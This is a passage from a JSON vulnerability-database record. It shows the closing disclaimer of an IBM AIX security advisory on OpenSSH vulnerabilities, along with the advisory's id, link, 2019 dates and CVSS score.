OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\nRESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\nVULNERABILITY.\n\n\n\n", "edition": 1, "modified": "2019-07-16T09:38:57", "published": "2019-07-16T09:38:57", "id": "OPENSSH_ADVISORY13.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory13.asc", "title": "Vulnerabilities in OpenSSH affect AIX.", "type": "aix", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}